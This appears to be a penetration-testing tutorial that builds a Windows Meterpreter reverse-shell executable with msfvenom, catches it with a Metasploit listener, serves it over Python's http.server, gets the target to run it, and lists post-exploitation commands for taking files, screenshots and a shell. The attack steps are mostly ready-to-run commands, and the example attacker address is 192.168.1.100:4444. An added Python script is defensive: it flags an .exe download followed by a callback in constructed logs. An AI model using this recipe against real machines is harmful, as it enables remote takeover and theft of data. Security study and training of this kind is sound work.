Step 1: Generating the Malicious .exe File using msfvenom
msfvenom is the payload generator of the Metasploit Framework. Here, we will generate an .exe file that makes a reverse connection back to the attacker’s system.
Run the following command to create a malicious .exe file:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your-IP-Address> LPORT=<Port> -f exe > malicious.exe
- -p windows/meterpreter/reverse_tcp: Specifies the payload, in this case a reverse TCP Meterpreter shell for Windows.
- LHOST: Your machine’s IP address (the attacker’s IP).
- LPORT: The port on which you want to receive the connection (commonly port 4444).
- -f exe: Tells msfvenom to generate a Windows .exe file.
- > malicious.exe: The output file will be named malicious.exe.
For example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > malicious.exe
Step 2: Setting up the Metasploit Listener
Now that the malicious .exe file has been generated, you need to set up a listener in Metasploit to capture the reverse shell connection.
- Start Metasploit: Open a terminal and start the Metasploit console by running:
msfconsole
- Set the Exploit Listener: Use the multi/handler module, which listens for reverse shells:
use exploit/multi/handler
- Set the Payload: Tell Metasploit what kind of payload to expect. Since we generated a reverse TCP meterpreter payload in step 1, we’ll set it like this:
set payload windows/meterpreter/reverse_tcp
- Configure LHOST and LPORT: Set the listening IP address and port to match the values you used when generating the payload:
set LHOST <Your-IP-Address>
set LPORT <Port>
For example:
set LHOST 192.168.1.100
set LPORT 4444
- Start the Listener: Run the following command to start the exploit listener:
exploit
The listener is now ready to catch any incoming connection from the malicious .exe file.
Step 3: Hosting the Malicious .exe File Using Python’s http.server
In this step, you’ll host the malicious .exe file on a local web server so that the target can download it. We’ll use Python’s built-in web server for this.
- Navigate to the Directory: First, navigate to the directory where the malicious.exe file is located:
cd /path/to/malicious.exe
- Start the Python Web Server: Run the following command to start the Python HTTP server on port 8000:
python3 -m http.server 8000
This serves the file over plain HTTP from your machine’s IP address; the target can download it from http://<Your-IP-Address>:8000/malicious.exe.
Step 4: Downloading and Executing the Malicious File on the Target
At this stage, you need the target (Windows machine) to download and run the malicious.exe file.
- Target Downloads the File: On the target machine, use a web browser to download the file from your server:
http://<Your-IP-Address>:8000/malicious.exe
Example:
http://192.168.1.100:8000/malicious.exe
- Target Executes the File: Once downloaded, instruct the target to run the malicious.exe file. This will trigger the reverse shell, connecting back to your Metasploit listener.
Step 5: Getting a Meterpreter Session
If everything has been set up correctly, as soon as the target executes the .exe file, you should see a meterpreter session open in your Metasploit console.
You’ll receive a prompt like this:
meterpreter >
Now you have a meterpreter session on the target machine, and you can execute commands to control the target.
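From a defender’s side, Steps 3 to 5 leave two correlated network artifacts: a host fetches an .exe over cleartext HTTP from a non-standard port, then the same host opens a connection back to the same server on another non-web port. The following Python script is an example added here, not part of the original tutorial; it shows one way to correlate the two in egress logs, and the log format, addresses and timestamps are all constructed for the example.

```python
"""Correlate a cleartext HTTP .exe download with a follow-on connection from
the same host back to the same server on a non-web port (the pattern the
http.server delivery and reverse_tcp callback above produce).
Log lines are CONSTRUCTED for this example, in a simplified egress-log format:
<epoch> <src_ip> <dst_ip> <dst_port> <HTTP|CONN> <detail...>"""
from collections import defaultdict

WEB_PORTS = {80, 443, 8080}   # ports where outbound traffic is expected
WINDOW_SECONDS = 300          # max gap between download and callback

CONSTRUCTED_LOG = """\
1700000000 10.0.0.5 192.168.1.100 8000 HTTP GET /malicious.exe SimpleHTTP/0.6
1700000012 10.0.0.5 192.168.1.100 4444 CONN tcp
1700000020 10.0.0.7 93.184.216.34 443 HTTP GET /index.html nginx
1700000040 10.0.0.9 192.168.1.100 8000 HTTP GET /readme.txt SimpleHTTP/0.6
1700000050 10.0.0.9 192.168.1.100 4444 CONN tcp
"""

def parse(log_text):
    """Split each line into a dict; 'detail' keeps the trailing fields."""
    events = []
    for line in log_text.splitlines():
        ts, src, dst, port, kind, *detail = line.split()
        events.append({"ts": int(ts), "src": src, "dst": dst,
                       "port": int(port), "kind": kind, "detail": detail})
    return events

def is_suspicious_download(ev):
    """Executable fetched over cleartext HTTP from a non-standard port."""
    if ev["kind"] != "HTTP" or len(ev["detail"]) < 2:
        return False
    return ev["detail"][1].lower().endswith(".exe") and ev["port"] not in WEB_PORTS

def correlate(events):
    """Return (host, server, path, callback_port) for every .exe download that
    the same host follows with a non-web-port connection to the same server."""
    downloads = defaultdict(list)
    for ev in events:
        if is_suspicious_download(ev):
            downloads[(ev["src"], ev["dst"])].append(ev)
    alerts = []
    for ev in events:
        if ev["kind"] != "CONN" or ev["port"] in WEB_PORTS:
            continue
        for dl in downloads.get((ev["src"], ev["dst"]), []):
            if 0 < ev["ts"] - dl["ts"] <= WINDOW_SECONDS:
                alerts.append((ev["src"], ev["dst"], dl["detail"][1], ev["port"]))
    return alerts

if __name__ == "__main__":
    for host, server, path, port in correlate(parse(CONSTRUCTED_LOG)):
        print(f"ALERT: {host} fetched {path} from {server}, then connected to port {port}")
```

Only the host that downloaded an .exe and then called back is flagged; the host that fetched a text file from the same server is not, which keeps the rule from firing on ordinary use of a development web server.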
Step 6: Post-Exploitation with Meterpreter
Once you have control of the target machine, you can use the following meterpreter commands:
- Get system information:
sysinfo
- Get a shell:
shell
- List running processes:
ps
- Capture a screenshot:
screenshot
- Download files from the target:
download <file-path>
- Upload files to the target:
upload <local-file-path> <remote-directory>
- Terminate the session:
exit
Step 7: Cleaning Up
- Stop the Python HTTP Server: In the terminal where you started the Python web server, press Ctrl+C to stop it.
- Close the Metasploit Session: In the Metasploit console, you can stop the exploit by typing:
exit
- Remove the Malicious File: Ensure that you remove the malicious .exe file from your system after testing, and inform the target system administrator if this was part of a penetration test or educational exercise.